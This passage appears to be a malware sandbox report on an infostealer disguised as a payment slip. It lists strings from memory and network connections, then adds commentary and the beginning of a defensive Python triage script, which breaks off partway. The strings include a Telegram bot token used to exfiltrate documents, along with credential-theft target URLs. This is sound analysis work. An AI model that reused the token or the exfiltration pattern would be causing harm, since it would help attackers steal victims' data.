0000001A.00000002.3643631225.00000000060D0000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3654699168.0000000006CA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://i.pki.goog/r1.crt0
Source: conserver.exe, 0000000D.00000002.3619471195.0000000003242000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3642218318.000000000672C000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3643963659.00000000067E4000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3642218318.0000000006720000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3656699383.0000000007307000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.00000000031A3000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3613427802.000000000148B000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.0000000003156000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.000000000327A000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1539307669.00000000033CD000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1539307669.0000000003388000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1543370328.000000000633D000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1549475670.0000000007390000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3643631225.000000000614D000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002BA9000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3643631225.0000000006122000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002B62000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002C14000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3643631225.00000000060D0000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002C5E000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3654699168.0000000006CA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://i.pki.goog/wr2.crt0
Source: conserver.exe, 0000000D.00000002.3619471195.0000000003242000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3642218318.000000000672C000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3643963659.00000000067E4000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3642218318.0000000006720000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3656699383.0000000007307000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.00000000031A3000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3613427802.000000000148B000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.0000000003156000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.000000000327A000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1539307669.00000000033CD000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1539307669.0000000003388000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1543370328.000000000633D000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1549475670.0000000007390000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3643631225.000000000614D000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002BA9000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3643631225.0000000006122000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002B62000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002C14000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3643631225.00000000060D0000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002C5E000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3654699168.0000000006CA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://o.pki.goog/wr20%
Source: bhv8E9.tmp.14.dr String found in binary or memory: http://ocsp.digicert.com0
Source: conserver.exe, 0000000D.00000002.3642218318.000000000672C000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3643963659.00000000067E4000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3656699383.0000000007300000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3642218318.0000000006720000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3656699383.0000000007307000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3613427802.000000000148B000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.0000000003156000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1549573175.00000000073A0000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1539307669.0000000003388000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1543370328.000000000633D000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1549475670.0000000007390000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3643631225.0000000006122000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002B62000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3643631225.00000000060D0000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3654699168.0000000006CA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.pki.goog/gsr10)
Source: Windows Update.exe, 00000018.00000002.1543370328.000000000633D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://pki.goog/
Source: conserver.exe, 0000000D.00000002.3642218318.000000000672C000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3643963659.00000000067E4000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3656699383.0000000007300000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3642218318.0000000006720000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3656699383.0000000007307000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3613427802.000000000148B000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.0000000003156000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1549573175.00000000073A0000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1539307669.0000000003388000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1543370328.000000000633D000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1549475670.0000000007390000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3643631225.0000000006122000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002B62000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3643631225.00000000060D0000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3654699168.0000000006CA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://pki.goog/gsr1/gsr1.crt02
Source: Payment_Slip.pdf.exe, 00000000.00000002.1186212278.00000000023F7000.00000004.00000800.00020000.00000000.sdmp, mHTmhPhJy.exe, 00000007.00000002.1242727523.0000000003157000.00000004.00000800.00020000.00000000.sdmp, host.exe, 0000000C.00000002.3622366959.0000000002691000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 00000019.00000002.3621446588.000000000251C000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 0000001B.00000002.3620392043.0000000002F31000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: conserver.exe, 0000000D.00000002.3619471195.0000000003242000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.0000000003195000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.0000000003156000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.000000000327A000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1539307669.00000000033CD000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1539307669.0000000003388000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002BA9000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002B62000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002C14000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002C5E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://smtp.gmail.com
Source: Payment_Slip.pdf.exe, 00000000.00000002.1190307997.0000000006532000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: Payment_Slip.pdf.exe, 00000000.00000002.1190307997.0000000006532000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: Payment_Slip.pdf.exe, Payment_Slip.pdf.exe, 00000010.00000002.1225391140.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.ebuddy.com
Source: Payment_Slip.pdf.exe, 00000000.00000002.1190307997.0000000006532000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com
Source: Payment_Slip.pdf.exe, 00000000.00000002.1190307997.0000000006532000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: Payment_Slip.pdf.exe, 00000000.00000002.1190307997.0000000006532000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: Payment_Slip.pdf.exe, 00000000.00000002.1190307997.0000000006532000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: Payment_Slip.pdf.exe, 00000000.00000002.1190307997.0000000006532000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: Payment_Slip.pdf.exe, 00000000.00000002.1190307997.0000000006532000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: Payment_Slip.pdf.exe, 00000000.00000002.1190307997.0000000006532000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: Payment_Slip.pdf.exe, 00000000.00000002.1190307997.0000000006532000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: Payment_Slip.pdf.exe, 00000000.00000002.1190307997.0000000006532000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fonts.com
Source: Payment_Slip.pdf.exe, 00000000.00000002.1190307997.0000000006532000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: Payment_Slip.pdf.exe, 00000000.00000002.1190307997.0000000006532000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: Payment_Slip.pdf.exe, 00000000.00000002.1190307997.0000000006532000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: Payment_Slip.pdf.exe, 00000000.00000002.1190307997.0000000006532000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: Payment_Slip.pdf.exe, 00000000.00000002.1190307997.0000000006532000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: Payment_Slip.pdf.exe, Payment_Slip.pdf.exe, 00000010.00000002.1225391140.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.imvu.com
Source: Payment_Slip.pdf.exe, 00000010.00000002.1225391140.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
Source: Payment_Slip.pdf.exe, 00000010.00000002.1225391140.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.imvu.comr
Source: Payment_Slip.pdf.exe, 00000000.00000002.1190307997.0000000006532000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: Payment_Slip.pdf.exe, 0000000E.00000002.1242122397.0000000001354000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://www.nirsoft.net
Source: Payment_Slip.pdf.exe, 00000010.00000002.1225391140.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.nirsoft.net/
Source: Payment_Slip.pdf.exe, 00000000.00000002.1190307997.0000000006532000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: Payment_Slip.pdf.exe, 00000000.00000002.1190307997.0000000006532000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sakkal.com
Source: Payment_Slip.pdf.exe, 00000000.00000002.1190307997.0000000006532000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.tiro.com
Source: Payment_Slip.pdf.exe, 00000000.00000002.1190307997.0000000006532000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.typography.netD
Source: Payment_Slip.pdf.exe, 00000000.00000002.1190307997.0000000006532000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: Windows Update.exe, 0000001A.00000002.3620793390.00000000029D9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.w3.or
Source: Payment_Slip.pdf.exe, 00000000.00000002.1190307997.0000000006532000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: Windows Update.exe, 0000001A.00000002.3620793390.0000000002A7C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://XlYyZVevQktG2Dz.org
Source: conserver.exe, 0000000D.00000002.3619471195.000000000306E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://XlYyZVevQktG2Dz.orgX
Source: conserver.exe, 0000000D.00000002.3619471195.000000000306E000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1539307669.00000000032A0000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002A7C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://XlYyZVevQktG2Dz.orgt-
Source: host.exe, 0000000C.00000002.3622366959.0000000002691000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 00000019.00000002.3621446588.000000000251C000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 0000001B.00000002.3620392043.0000000002F31000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ipify.org
Source: host.exe, 0000000C.00000002.3622366959.0000000002691000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 00000019.00000002.3621446588.000000000251C000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 0000001B.00000002.3620392043.0000000002F31000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ipify.org/
Source: host.exe, 0000000C.00000002.3622366959.0000000002742000.00000004.00000800.00020000.00000000.sdmp, host.exe, 0000000C.00000002.3622366959.00000000026F8000.00000004.00000800.00020000.00000000.sdmp, host.exe, 0000000C.00000002.3622366959.00000000027BE000.00000004.00000800.00020000.00000000.sdmp, host.exe, 0000000C.00000002.3622366959.0000000002795000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 00000019.00000002.3621446588.0000000002578000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 00000019.00000002.3621446588.0000000002693000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 00000019.00000002.3621446588.000000000283C000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 00000019.00000002.3621446588.00000000025C1000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 00000019.00000002.3621446588.0000000002707000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 00000019.00000002.3621446588.00000000027CC000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 0000001B.00000002.3620392043.0000000002FFD000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 0000001B.00000002.3620392043.0000000002FDF000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 0000001B.00000002.3620392043.000000000307B000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 0000001B.00000002.3620392043.0000000003146000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 0000001B.00000002.3620392043.0000000002F95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: host.exe, 0000000C.00000002.3622366959.0000000002691000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 00000019.00000002.3621446588.000000000251C000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 0000001B.00000002.3620392043.0000000002F31000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot5612460560:AAHyXkizBwpknHBFsEt3GDIwhLylabAVwjM/
Source: host.exe, 0000000C.00000002.3622366959.0000000002742000.00000004.00000800.00020000.00000000.sdmp, host.exe, 0000000C.00000002.3622366959.00000000026F8000.00000004.00000800.00020000.00000000.sdmp, host.exe, 0000000C.00000002.3622366959.00000000027BE000.00000004.00000800.00020000.00000000.sdmp, host.exe, 0000000C.00000002.3622366959.0000000002795000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 00000019.00000002.3621446588.0000000002578000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 00000019.00000002.3621446588.0000000002693000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 00000019.00000002.3621446588.000000000283C000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 00000019.00000002.3621446588.00000000025C1000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 00000019.00000002.3621446588.0000000002707000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 00000019.00000002.3621446588.00000000027CC000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 0000001B.00000002.3620392043.0000000002FFD000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 0000001B.00000002.3620392043.0000000002FDF000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 0000001B.00000002.3620392043.000000000307B000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 0000001B.00000002.3620392043.0000000003146000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 0000001B.00000002.3620392043.0000000002F95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot5612460560:AAHyXkizBwpknHBFsEt3GDIwhLylabAVwjM/sendDocument
Source: svchost.exe, 0000000A.00000003.1203278984.000001F041512000.00000004.00000800.00020000.00000000.sdmp, edb.log.10.dr, qmgr.db.10.dr String found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
Source: edb.log.10.dr, qmgr.db.10.dr String found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: edb.log.10.dr, qmgr.db.10.dr String found in binary or memory: https://g.live.com/odclientsettings/ProdV2
Source: edb.log.10.dr, qmgr.db.10.dr String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: svchost.exe, 0000000A.00000003.1203278984.000001F041512000.00000004.00000800.00020000.00000000.sdmp, edb.log.10.dr String found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
Source: Payment_Slip.pdf.exe, 0000000E.00000002.1242674195.000000000155D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.liv
Source: Payment_Slip.pdf.exe String found in binary or memory: https://login.yahoo.com/config/login
Source: svchost.exe, 0000000A.00000003.1203278984.000001F041512000.00000004.00000800.00020000.00000000.sdmp, edb.log.10.dr, qmgr.db.10.dr String found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
Source: edb.log.10.dr String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
Source: conserver.exe, 0000000D.00000002.3619471195.0000000003242000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.0000000003171000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.0000000003179000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.0000000003175000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.00000000031F8000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.00000000031F0000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.000000000320E000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.000000000327A000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.0000000003166000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.00000000031BB000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.00000000031F4000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1539307669.00000000033A2000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1539307669.00000000033AB000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1539307669.00000000033A7000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1539307669.00000000033EE000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1539307669.0000000003398000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1539307669.000000000342E000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002B81000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002C02000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002C0A000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002B85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.google.com/a/answer/166852
Source: Payment_Slip.pdf.exe, Payment_Slip.pdf.exe, 00000010.00000002.1225391140.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: Payment_Slip.pdf.exe String found in binary or memory: https://www.google.com/accounts/servicelogin
Source: conserver.exe, 0000000D.00000002.3619471195.0000000003002000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1539307669.0000000003232000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002A12000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49761 version: TLS 1.2
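The string list above mixes three kinds of evidence: font-foundry and licence URLs that ride along in embedded font metadata (fontbureau.com, founder.com.cn, apache.org and the like), OneDrive/BITS URLs that come from the sandbox's own svchost.exe and its edb.log/qmgr.db files, and the strings that actually matter: the Telegram Bot API URL with an embedded bot token and the sendDocument method in host.exe and mykksg.exe, api.ipify.org (a public-IP lookup service) in the same processes, smtp.gmail.com in conserver.exe and Windows Update.exe, and the credential-harvest target URLs (login.live.com, login.yahoo.com, google.com/accounts/servicelogin, imvu.com, ebuddy.com) in the unpacked Payment_Slip.pdf.exe modules. The TLS lines corroborate the first two: 149.154.167.220 lies in Telegram's 149.154.160.0/20 range and 104.26.12.205 in Cloudflare's 104.16.0.0/12, which fronts api.ipify.org. The Python below is an added triage example, not part of the Joe Sandbox report and not code from the sample: it parses a constructed excerpt of the lines above in the report's own format, sorts hosts into noise, exfil, credential_targets and review buckets, and pulls out any Telegram bot token. The classification tables, the BACKGROUND_SOURCES set and the FAKE_TOKEN value are assumptions of the example (the token has the real shape but a made-up value).

```python
"""Triage of 'String found in binary or memory' lines from a sandbox report.

Added example, not part of the report: separates embedded-font and OS noise
from exfiltration endpoints and pulls Telegram bot tokens out of Bot API URLs.
"""
import re
from collections import defaultdict
from urllib.parse import urlsplit

LINE_RE = re.compile(r"^Source: (?P<src>.+?) String found in binary or memory: (?P<val>\S+)")
# Adjacent strings are often fused ("...imvu.comhttp://www.ebuddy.com"),
# so each URL ends where the next scheme starts, not at whitespace.
URL_RE = re.compile(r"https?://(?:(?!https?://)\S)+")
# Telegram bot token: numeric bot id, a colon, then a 35-character secret.
TG_TOKEN_RE = re.compile(r"/bot(\d{8,10}:[A-Za-z0-9_-]{35})")

# Classification tables are assumptions of this example, built from the hosts on the page.
FONT_AND_LICENCE_NOISE = (  # font foundries and licence text carried in embedded fonts
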